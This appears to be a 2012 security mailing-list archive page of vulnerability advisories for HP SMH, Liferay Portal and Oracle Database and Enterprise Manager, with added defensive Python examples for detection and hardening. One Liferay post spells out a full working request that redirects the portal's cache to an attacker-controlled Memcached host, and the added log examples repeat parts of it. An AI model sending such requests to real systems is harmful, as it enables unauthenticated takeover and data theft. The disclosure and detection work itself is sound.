[security bulletin] HPSBMU02764 SSRT100827 rev.2 - HP System Management Homepage (SMH) Running on Linux and Windows, Remote Cross Site Request Forgery (CSRF), Denial of Service (DoS), Execution of Arb

2012-04-20 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03280632
Version: 2

HPSBMU02764 SSRT100827 rev.2 - HP System Management Homepage (SMH) Running on 
Linux and Windows, Remote Cross Site Request Forgery (CSRF), Denial of Service 
(DoS), Execution of Arbitrary Code, Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2012-04-16
Last Updated: 2012-04-19

Potential Security Impact: Remote cross site request forgery (CSRF), Denial of 
Service (DoS), execution of arbitrary code, other vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP System 
Management Homepage (SMH) running on Linux and Windows. The vulnerabilities 
could be exploited remotely and locally resulting in cross site request forgery 
(CSRF), Denial of Service (DoS), execution of arbitrary code, and other 
vulnerabilities.

References: CVE-2009-0037, CVE-2010-0734, CVE-2010-1452, CVE-2010-1623, 
CVE-2010-2068, CVE-2010-2791, CVE-2010-3436, CVE-2010-4409, CVE-2010-4645, 
CVE-2011-0014, CVE-2011-0195, CVE-2011-0419, CVE-2011-1148, CVE-2011-1153, 
CVE-2011-1464, CVE-2011-1467, CVE-2011-1468, CVE-2011-1470, CVE-2011-1471, 
CVE-2011-1928, CVE-2011-1938, CVE-2011-1945, CVE-2011-2192, CVE-2011-2202, 
CVE-2011-2483, CVE-2011-3182, CVE-2011-3189, CVE-2011-3192, CVE-2011-3267, 
CVE-2011-3268, CVE-2011-3207, CVE-2011-3210, CVE-2011-3348, CVE-2011-3368, 
CVE-2011-3639, CVE-2011-3846, SSRT100376, CVE-2012-0135, SSRT100609, 
CVE-2012-1993, SSRT10043

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) before v7.0 running on Linux and Windows.

BACKGROUND

CVSS 2.0 Base Metrics
=========================================================
  Reference      Base Vector                   Base Score
  CVE-2009-0037  (AV:N/AC:M/Au:N/C:P/I:P/A:P)  6.8
  CVE-2010-0734  (AV:N/AC:M/Au:N/C:P/I:P/A:P)  6.8
  CVE-2010-1452  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2010-1623  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2010-2068  (AV:N/AC:L/Au:N/C:P/I:N/A:N)  5.0
  CVE-2010-2791  (AV:N/AC:L/Au:N/C:P/I:N/A:N)  5.0
  CVE-2010-3436  (AV:N/AC:L/Au:N/C:N/I:P/A:N)  5.0
  CVE-2010-4409  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2010-4645  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2011-0014  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2011-0195  (AV:N/AC:M/Au:N/C:P/I:N/A:N)  4.3
  CVE-2011-0419  (AV:N/AC:M/Au:N/C:N/I:N/A:P)  4.3
  CVE-2011-1148  (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
  CVE-2011-1153  (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
  CVE-2011-1464  (AV:N/AC:M/Au:N/C:N/I:N/A:P)  4.3
  CVE-2011-1467  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2011-1468  (AV:N/AC:M/Au:N/C:N/I:N/A:P)  4.3
  CVE-2011-1470  (AV:N/AC:M/Au:N/C:N/I:N/A:P)  4.3
  CVE-2011-1471  (AV:N/AC:M/Au:N/C:N/I:N/A:P)  4.3
  CVE-2011-1928  (AV:N/AC:M/Au:N/C:N/I:N/A:P)  4.3
  CVE-2011-1938  (AV:N/AC:L/Au:N/C:P/I:P/A:P)  7.5
  CVE-2011-1945  (AV:N/AC:H/Au:N/C:P/I:N/A:N)  2.6
  CVE-2011-2192  (AV:N/AC:M/Au:N/C:P/I:N/A:N)  4.3
  CVE-2011-2202  (AV:N/AC:L/Au:N/C:N/I:P/A:P)  6.4
  CVE-2011-2483  (AV:N/AC:L/Au:N/C:P/I:N/A:N)  5.0
  CVE-2011-3182  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2011-3189  (AV:N/AC:M/Au:N/C:P/I:N/A:N)  4.3
  CVE-2011-3192  (AV:N/AC:L/Au:N/C:N/I:N/A:C)  7.8
  CVE-2011-3267  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2011-3268  (AV:N/AC:L/Au:N/C:C/I:C/A:C)  10.0
  CVE-2011-3207  (AV:N/AC:L/Au:N/C:N/I:P/A:N)  5.0
  CVE-2011-3210  (AV:N/AC:L/Au:N/C:N/I:N/A:P)  5.0
  CVE-2011-3348  (AV:N/AC:M/Au:N/C:N/I:N/A:P)  4.3
  CVE-2011-3368  (AV:N/AC:L/Au:N/C:P/I:N/A:N)  5.0
  CVE-2011-3639  (AV:N/AC:M/Au:N/C:N/I:P/A:N)  4.3
  CVE-2011-3846  (AV:N/AC:M/Au:N/C:P/I:P/A:P)  6.8
  CVE-2012-0135  (AV:N/AC:M/Au:S/C:N/I:N/A:P)  3.5
  CVE-2012-1993  (AV:L/AC:L/Au:S/C:P/I:P/A:N)  3.2
=========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Sow Ching Shiong, coordinating with Secunia, 
for reporting CVE-2011-3846 to security-al...@hp.com.

The Hewlett-Packard Company thanks Silent Dream for reporting CVE-2012-0135 to 
security-al...@hp.com.

RESOLUTION

HP has provided HP System Management Homepage v7.0 or subsequent to resolve the 
vulnerabilities.

SMH v7.0 is available here: 
http://h18000.www1.hp.com/products/servers/management/agents/index.html

HISTORY
Version:1 (rev.1) 16 April 2012 Initial release
Version:2 (rev.2) 19 April 2012 Remove CVE-2011-4317

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 

IPv6 host scanning in IPv6

2012-04-20 Thread Fernando Gont
Folks,

We've just published an IETF internet-draft about IPv6 host scanning
attacks.

The aforementioned document is available at:


The Abstract of the document is:
 cut here 
   IPv6 offers a much larger address space than that of its IPv4
   counterpart.  The standard /64 IPv6 subnets can (in theory)
   accommodate approximately 1.844 * 10^19 hosts, thus resulting in a
   much lower host density (#hosts/#addresses) than their IPv4
   counterparts.  As a result, it is widely assumed that it would take a
   tremendous effort to perform host scanning attacks against IPv6
   networks, and therefore IPv6 host scanning attacks have long been
   considered unfeasible.  This document analyzes the IPv6 address
   configuration policies implemented in most popular IPv6 stacks, and
   identifies a number of patterns in the resulting addresses that lead to a
   tremendous reduction in the host address search space, thus
   dismantling the myth that IPv6 host scanning attacks are unfeasible.
 cut here 

Any comments will be very welcome (note: this is a drafty initial
version, with lots of stuff still to be added... but hopefully a good
starting point, and a nice reading ;-) ).

Thanks!

P.S.: Public discussion mostly welcome on the IPv6 hackers mailing-list, but
I'd be happy to discuss it here, too.

Best regards,
-- 
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492






Specially crafted webdav request allows reading of local files on liferay 6.0.x

2012-04-20 Thread Jelmer Kuperus
Specially crafted webdav request allows reading of local files on liferay 6.0.x

Description:

Liferay Portal is an enterprise portal written in Java

By creating a specially crafted webdav request that contains an
external entity it is possible to read files from a Liferay server
and echo these back in the response.  You could use this for instance
to download configuration files containing database passwords or ssh
keys located in a user's home folder.

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-24562-proof

Systems affected:

Liferay 6.0.5 ce is confirmed to be vulnerable
Liferay 6.0.6 ce is confirmed to be vulnerable

Vendor status :

Liferay was notified January 2 2012 by filing a bug in their public
bugtracker under issue number LPS-24562. The issue has since been
flagged as private and has been resolved.


OCIPasswordChange API leaks information of password hash (CVE-2012-0511)

2012-04-20 Thread Shatter

AppSecInc Team SHATTER Security Advisory

OCIPasswordChange API leaks information of password hash.

Risk Level:
High

Affected versions:
Oracle Database Server version 10gR1, 10gR2 (10.2.0.4 and previous
patchsets) and 11gR1 (11.1.0.7 and previous patchsets)


Remote exploitable:
Yes (No authentication is required)

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Oracle Database provides the OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed; this is because it can be used for
accounts whose password has expired, so that the user is able to
change an expired password for a new one.
It was observed that for locked accounts this API leaks information
about the correct user password hash by giving different responses,
depending on whether the decryption of the new password
(AUTH_NEW_PASSWORD field), performed by the server, is successful or
not.  This information can be used to perform an off-line brute force
attack to guess the correct password.  An internal proof-of-concept tool
demonstrated that it is possible to try millions of passwords per
second, making it possible to crack passwords that are less than 9
characters in length in a few hours.
Note that to perform this attack the account must be locked.  An
attacker can lock an account by reaching the maximum failed login
attempts limit (by default 10).  The attacker will be able to log in as
the user once the account is unlocked.

Impact:
Remote unauthenticated attackers can perform off-line unlimited password
guesses on locked database accounts.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Implement a strong password policy.
Use some kind of external authentication (like network or directory
service based) instead of native database authentication.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0511

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3434

Timeline:
Vendor Notification - 12/08/2011
Vendor Response - 12/15/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012




-- 
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.


Oracle Enterprise Manager vulnerable to Session fixation (CVE-2012-0528)

2012-04-20 Thread Shatter

AppSecInc Team SHATTER Security Advisory

Oracle Enterprise Manager vulnerable to Session fixation.

Risk Level:
Low

Affected versions:
Oracle Enterprise Manager Database Control 10.2.0.5, 11.1.0.7 (and
previous patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Authenticating a web user without invalidating any existing session
identifier gives an attacker the opportunity to steal authenticated
sessions.
Oracle Enterprise Manager authenticates a user without first
invalidating the existing session ID, thereby continuing to use the same
session ID already associated with the session.  This can be exploited
in shared computer environments if the attacker navigates to the login
web page /em/console/logon/logon and records the session ID associated,
then closes the browser.  When a legitimate user logs on, the same
Session ID will be used so the attacker will be able to take over the
session and perform operations on the victim's behalf.

Impact:
An attacker who has access to a computer with a web browser that will
later be used in an Oracle Enterprise Manager web session can know
which session ID will be used, and will therefore be able to impersonate
the legitimate user.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0528

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3429

Timeline:
Vendor Notification - 08/16/2011
Vendor Response - 08/18/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


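The session-handling defect the advisory above describes, shown as an added example (not Oracle's code; the store, function names and "victim" user are hypothetical): an in-memory session store whose login routine either keeps the pre-authentication session ID, as the advisory says Enterprise Manager does, or invalidates it and issues a fresh one.

```python
"""Session fixation: login that keeps the pre-auth session ID next to
login that rotates it.  Added example; hypothetical names throughout."""
import secrets


class SessionStore:
    """Minimal server-side session table: session_id -> {"user": name-or-None}."""

    def __init__(self):
        self._sessions = {}

    def new_session(self):
        """Issue an anonymous session, as a server does when the logon page is first visited."""
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"user": None}
        return sid

    def user_for(self, sid):
        """Return the user bound to a session ID, or None if the ID is unknown/anonymous."""
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None

    def login_keep_id(self, sid, username):
        """Vulnerable pattern: authenticate in place, so whoever recorded the
        pre-auth ID now holds an authenticated session."""
        self._sessions[sid]["user"] = username
        return sid

    def login_rotate_id(self, sid, username):
        """Hardened pattern: drop the pre-auth ID and bind the user to a new one."""
        self._sessions.pop(sid, None)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = {"user": username}
        return new_sid


def fixation_scenario(rotate):
    """Replay the shared-computer scenario: an ID is recorded before login,
    then the legitimate user logs in.  Returns (user visible through the
    recorded pre-auth ID, user visible through the ID the server handed back)."""
    store = SessionStore()
    pre_auth_sid = store.new_session()          # recorded, then the browser is closed
    login = store.login_rotate_id if rotate else store.login_keep_id
    active_sid = login(pre_auth_sid, "victim")  # legitimate user logs on later
    return store.user_for(pre_auth_sid), store.user_for(active_sid)


if __name__ == "__main__":
    print("keep id  :", fixation_scenario(rotate=False))  # pre-auth ID is now authenticated
    print("rotate id:", fixation_scenario(rotate=True))   # pre-auth ID is dead
```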


HTTP Response Splitting in Oracle Enterprise Manager (pageName parameter) (CVE-2012-0527)

2012-04-20 Thread Shatter

AppSecInc Team SHATTER Security Advisory

HTTP Response Splitting in Oracle Enterprise Manager (pageName parameter).

Risk Level:
Medium

Affected versions:
Oracle Enterprise Manager Database Control 10.2.0.5, 11.1.0.7, 11.2.0.3
(and previous patchsets)
Oracle Enterprise Manager Grid Control 10.2.0.5 (and previous patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
HTTP Response Splitting is a web application vulnerability where input
parameters are unsafely used in response headers, allowing an attacker to
make the server print one (or more) new line sequences in the header
section, which allows them to set arbitrary headers, take control of the body,
or break the response into two or more separate responses.  This can be
used to perform cross-site scripting, cross-user defacement and web
cache poisoning, among other attacks.
The 'pageName' parameter of web page
/em/console/database/schema/grantObjPrivs is vulnerable to this kind of
attack.

Impact:
An attacker that convinces a valid Oracle Enterprise Manager user to
click or open a malicious link can take over the user's session.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0527

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3453

Timeline:
Vendor Notification - 08/16/2011
Vendor Response - 08/18/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012




HTTP Response Splitting in Oracle Enterprise Manager (prevPage parameter) (CVE-2012-0526)

2012-04-20 Thread Shatter

AppSecInc Team SHATTER Security Advisory

HTTP Response Splitting in Oracle Enterprise Manager (prevPage parameter).

Risk Level:
Medium

Affected versions:
Oracle Enterprise Manager Database Control 10.2.0.5, 11.1.0.7, 11.2.0.3
(and previous patchsets)
Oracle Enterprise Manager Grid Control 10.2.0.5 (and previous patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
HTTP Response Splitting is a web application vulnerability where input
parameters are unsafely used in response headers, allowing an attacker to
make the server print one (or more) new line sequences in the header
section, which allows them to set arbitrary headers, take control of the body,
or break the response into two or more separate responses.  This can be
used to perform cross-site scripting, cross-user defacement and web
cache poisoning, among other attacks.
The 'prevPage' parameter of web page /em/console/database/schema/table
is vulnerable to this kind of attack.

Impact:
An attacker that convinces a valid Oracle Enterprise Manager user to
click or open a malicious link can take over the user's session.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0526

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3448

Timeline:
Vendor Notification - 08/16/2011
Vendor Response - 08/18/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


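The header-injection mechanism described in this advisory and in the pageName advisory above, as an added example (not Oracle's code; the redirect builders, the log format and the sample values are hypothetical): a redirect whose Location header is built from a page parameter, first copied through unchanged and then with CR/LF rejected and the value percent-encoded, plus a check that flags CR/LF sequences in the query strings of access-log lines.

```python
"""Response-splitting guard for a parameter copied into a response header,
plus an access-log check for CR/LF in query parameters.  Added example;
the builders, log lines and parameter values are constructed."""
import re
from urllib.parse import parse_qs, quote, urlsplit

CRLF_RE = re.compile(r"[\r\n]")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def build_redirect_unsafe(page_name):
    """Vulnerable pattern: the parameter lands in the header unchanged, so a
    CR/LF inside it starts a new header line (or a new response)."""
    return "HTTP/1.1 302 Found\r\nLocation: /em/console/" + page_name + "\r\n\r\n"


def build_redirect_safe(page_name):
    """Hardened pattern: refuse control characters outright, then percent-encode
    whatever remains so no byte can act as a header delimiter."""
    if CRLF_RE.search(page_name):
        raise ValueError("CR/LF in header value")
    encoded = quote(page_name, safe="/")
    return "HTTP/1.1 302 Found\r\nLocation: /em/console/" + encoded + "\r\n\r\n"


def safe_builder_rejects(page_name):
    """True if the hardened builder refuses the value."""
    try:
        build_redirect_safe(page_name)
    except ValueError:
        return True
    return False


def header_count(raw_response):
    """Number of header lines before the blank line; one more than expected
    means the parameter split the header section."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    return len(head.split("\r\n")) - 1  # drop the status line


def query_has_crlf(log_line):
    """Detection over an access-log line: decode every query parameter and
    report whether any of them carries a CR or LF (%0D / %0A on the wire)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    query = urlsplit(m.group("target")).query
    params = parse_qs(query, keep_blank_values=True)
    return any(CRLF_RE.search(v) for values in params.values() for v in values)


# Constructed sample values (not taken from the advisory).
CONSTRUCTED_INPUT = "database/schema/table\r\nX-Injected: 1"
CONSTRUCTED_LOG_LINE = ('192.0.2.10 - - [20/Apr/2012:11:02:44 +0000] '
                        '"GET /em/console/database/schema/table?prevPage=schema%2Ftable%0D%0AX-Injected:%201 HTTP/1.1" 302 0')
CONSTRUCTED_CLEAN_LOG_LINE = ('192.0.2.10 - - [20/Apr/2012:11:02:50 +0000] '
                              '"GET /em/console/database/schema/table?prevPage=schema%2Ftable HTTP/1.1" 302 0')

if __name__ == "__main__":
    print("unsafe header lines:", header_count(build_redirect_unsafe(CONSTRUCTED_INPUT)))
    print("safe builder rejects:", safe_builder_rejects(CONSTRUCTED_INPUT))
    print("log line flagged:", query_has_crlf(CONSTRUCTED_LOG_LINE))
```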


SQL Injection in Oracle Enterprise Manager (searchPage web page) (CVE-2012-0525)

2012-04-20 Thread Shatter

AppSecInc Team SHATTER Security Advisory

SQL Injection in Oracle Enterprise Manager (searchPage web page).

Risk Level:
High

Affected versions:
Oracle Enterprise Manager Database Control 11.1.0.7, 11.2.0.3 (and
previous patchsets)
Oracle Enterprise Manager Grid Control 10.2.0.5, 11.1.0.1 (and previous
patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
SQL Injection works by attempting to modify the parameters passed to an
application to change the SQL statements that are passed to a database.
SQL injection can be used to insert additional SQL statements to be
executed.
The 'SCPLBL_INSTALLED_DATE0DI' parameter used in web page
/em/console/ecm/search/searchPage is vulnerable to SQL Injection
attacks. This web page is part of Oracle Enterprise Manager web
application. It may be possible for a malicious user to execute SQL
statements with the elevated privileges of the SYSMAN database user in
the repository database. This user has the DBA role granted.

Impact:
This vulnerability allows an Oracle Enterprise Manager user to execute
SQL statements with the elevated privileges of the SYSMAN database user.
This may also be exploited by an attacker that convinces a valid user to
click or open a malicious link.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0525

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3418

Timeline:
Vendor Notification - 08/16/2011
Vendor Response - 08/18/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012




Liferay 6.1 can be compromised in its default configuration

2012-04-20 Thread Jelmer Kuperus
Liferay 6.1 can be compromised in its default configuration

Description:

Liferay Portal is an enterprise portal written in Java

By utilizing the json webservices exposed by the platform you can
register a new user with any role in the system, including the built
in administrator role.
The problem lies in the addUser method of UserServiceUtil which
accepts a roleIds parameter. There are no checks on whether the
calling user has rights to assign this role. User self-registration
needs to be enabled on the portal to execute this attack.

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-26705-proof

Systems affected:

Liferay 6.1 ce is confirmed to be vulnerable
Liferay 6.1 ee is most likely vulnerable
Liferay 6 is probably only vulnerable when SOAP, Hessian, Burlap or
HttpInvoker services are available to the attacker

Vendor status :

Liferay was notified April 15 2012 by filing a bug in their public
bugtracker under issue number LPS-26705. The issue has since been
flagged as private and has not yet been resolved.


SQL Injection in Oracle Enterprise Manager (compareWizFirstConfig web page) (CVE-2012-0512)

2012-04-20 Thread Shatter

AppSecInc Team SHATTER Security Advisory

SQL Injection in Oracle Enterprise Manager (compareWizFirstConfig web page).

Risk Level:
High

Affected versions:
Oracle Enterprise Manager Database Control 11.1.0.7, 11.2.0.2 (and
previous patchsets)
Oracle Enterprise Manager Grid Control 10.2.0.4 (and previous patchsets)


Remote exploitable:
Yes

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
SQL Injection works by attempting to modify the parameters passed to an
application to change the SQL statements that are passed to a database.
SQL injection can be used to insert additional SQL statements to be
executed.
The 'fConfigGuid' parameter used in web page
/em/console/ecm/config/compareWizard/compareWizFirstConfig is vulnerable
to SQL Injection attacks. This web page is part of Oracle Enterprise
Manager web application. It may be possible for a malicious user to
execute SQL statements with the elevated privileges of the SYSMAN
database user in the repository database. This user has the DBA role
granted.

Impact:
This vulnerability allows an Oracle Enterprise Manager user to execute
SQL statements with the elevated privileges of the SYSMAN database user.
This may also be exploited by an attacker that convinces a valid user to
click or open a malicious link.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
There is no workaround for this vulnerability.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0512

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3424

Timeline:
Vendor Notification - 10/16/2009
Vendor Response - 11/4/2009
Fix - 4/17/2012
Public Disclosure - 4/19/2012




Specially crafted Json service request allows full control over a Liferay portal instance

2012-04-20 Thread Jelmer Kuperus
Specially crafted Json service request allows full control over a
Liferay portal instance

Description:

Liferay Portal is an enterprise portal written in Java

By doing a single http request you can reconfigure Liferay to use a
remote Memcached cache instead of its own cache.

http://vulnerablehost/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]&userId=1&bytes={"class":"com.liferay.portal.kernel.dao.orm.EntityCacheUtil","entityCache":{"class":"com.liferay.portal.dao.orm.common.EntityCacheImpl","multiVMPool":{"class":"com.liferay.portal.cache.MultiVMPoolImpl","portalCacheManager":{"class":"com.liferay.portal.cache.memcached.MemcachePortalCacheManager","timeout":60,"timeoutTimeUnit":"SECONDS","memcachedClientPool":{"class":"com.liferay.portal.cache.memcached.DefaultMemcachedClientFactory","connectionFactory":{"class":"net.spy.memcached.BinaryConnectionFactory"},"addresses":["remoteattackerhost:11211"]}

This means that all entities stored in the database will now be cached
in a Memcached instance hosted on the attacker's host, where they can
be retrieved or manipulated at will by the attacker. A moderately
skilled attacker could leverage this to gain administrative access to
the system. The attacker does not need to have an account on the
portal in order to execute this attack.

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/LPS-26558-proof

Systems affected:

Liferay 6.1 ce is confirmed to be vulnerable
Liferay 6 ee service pack 2 is most likely vulnerable
Liferay 6.1 ee is most likely vulnerable

Vendor status :

Liferay was notified April 6 2012 by filing a bug in their public
bugtracker under issue number LPS-26558. The issue has since been
flagged as private and has been resolved.
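An added detection example covering this post and the LPS-26705 post above (not Liferay's code and not the linked proof-of-concept repositories; the log format, IPs, screen name and role id are constructed): an access-log audit that flags the two json_service request shapes the posts describe, an addUser call that carries caller-supplied roleIds, and any parameter whose JSON value names a "class" to instantiate, as the updatePortrait request does.

```python
"""Audit Liferay /c/portal/json_service calls in web-server access logs.
Added example; log lines and their values are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A JSON value that selects the class to build, as in the updatePortrait request above.
CLASS_KEY_RE = re.compile(r'"class"\s*:')


def audit_json_service(log_line):
    """Return a list of findings for one access-log line; empty if nothing is suspicious."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/json_service"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    method = params.get("serviceMethodName", [""])[0]
    findings = []
    # Shape 1 (LPS-26705): self-registration that also chooses its own roles.
    if method == "addUser" and "roleIds" in params:
        findings.append("addUser with caller-supplied roleIds: %s" % params["roleIds"][0])
    # Shape 2 (LPS-26558): a parameter carrying a class-typed JSON object.
    for name, values in params.items():
        if any(CLASS_KEY_RE.search(v) for v in values):
            findings.append("typed JSON object in parameter %r (method %s)" % (name, method))
    return findings


def audit_log(lines):
    """Map line index -> findings for every line that produced at least one finding."""
    report = {}
    for i, line in enumerate(lines):
        findings = audit_json_service(line)
        if findings:
            report[i] = findings
    return report


# Constructed sample log (Common Log Format); addresses and ids are made up.
CONSTRUCTED_LOG = [
    '198.51.100.7 - - [20/Apr/2012:09:12:01 +0000] "GET /c/portal/json_service'
    '?serviceClassName=com.liferay.portal.service.UserServiceUtil'
    '&serviceMethodName=updatePortrait&serviceParameters=[%22userId%22%2C%22bytes%22]'
    '&userId=1&bytes=%7B%22class%22%3A%22com.liferay.portal.kernel.dao.orm.EntityCacheUtil%22%7D'
    ' HTTP/1.1" 200 41',
    '198.51.100.7 - - [20/Apr/2012:09:12:05 +0000] "POST /c/portal/json_service'
    '?serviceClassName=com.liferay.portal.service.UserServiceUtil'
    '&serviceMethodName=addUser&screenName=newuser&roleIds=[10159] HTTP/1.1" 200 77',
    '203.0.113.9 - - [20/Apr/2012:09:13:10 +0000] "GET /c/portal/json_service'
    '?serviceClassName=com.liferay.portal.service.UserServiceUtil'
    '&serviceMethodName=getUserById&userId=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [20/Apr/2012:09:13:12 +0000] "GET /web/guest/home HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for idx, findings in audit_log(CONSTRUCTED_LOG).items():
        for f in findings:
            print("line %d: %s" % (idx, f))
```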


Some failed authentication attempts using OCIPasswordChange API are not recorded (CVE-2012-0511)

2012-04-20 Thread Shatter

AppSecInc Team SHATTER Security Advisory

Some failed authentication attempts using OCIPasswordChange API are not
recorded.

Risk Level:
Medium

Affected versions:
Oracle Database Server version 10gR1, 10gR2 (10.2.0.4 and previous
patchsets) and 11gR1 (11.1.0.7 and previous patchsets)


Remote exploitable:
Yes (No authentication is required)

Credits:
This vulnerability was discovered and researched by Esteban Martinez
Fayo of Application Security Inc.

Details:
Oracle Database provides the OCIPasswordChange API to change user passwords.
This API can be used while a user is logged on as well as before the
authentication process is completed, because it must also serve accounts
whose password has expired, so that the user can replace the expired
password with a new one.
When this API is used to authenticate a user and change the password at
the same time, failed login attempts are recorded only sporadically. The
failed login attempt is recorded only when the decryption of the new
password (AUTH_NEW_PASSWORD field), performed by the server, is
successful.  This allows an attacker to perform far more failed login
attempts than the password policy actually allows.  The approximate rate
of failed login attempts that are recorded is only one in every 200 or
more attempts.

Impact:
Remote unauthenticated attackers can perform a much higher number of
login attempts without being locked out by the password policy.  In
addition, the failed login attempts are not recorded in the database
audit trail.

Vendor Status:
Vendor was contacted and a patch was released.

Workaround:
Implement a strong password policy.
Use network or directory service based authentication as opposed to
native database authentication.

Fix:
Apply Oracle Critical Patch Update April 2012 available at Oracle Support.

CVE:
CVE-2012-0511

Links:
http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html
https://www.teamshatter.com/?p=3440

Timeline:
Vendor Notification - 12/08/2011
Vendor Response - 12/15/2011
Fix - 4/17/2012
Public Disclosure - 4/19/2012


- --
_
Copyright (c) 2012 Application Security, Inc.
http://www.appsecinc.com
About Application Security, Inc.

AppSecInc is a pioneer and leading provider of database security
solutions for the enterprise.
By providing strategic and scalable software-only solutions -
AppDetectivePro for auditors and IT advisors, and DbProtect for the
enterprise - AppSecInc supports the database security lifecycle for some
of the most complex and demanding environments in the world across more
than 1,300 active commercial and government customers.

Leveraging the world's most comprehensive database security
knowledgebase from the company's renowned team of threat researchers,
TeamSHATTER, AppSecInc products help customers achieve unprecedented
levels of data security from nefarious or accidental activities, while
reducing overall risk and helping to ensure continuous regulatory and
industry compliance.

Disclaimer: The information in the advisory is believed to be accurate
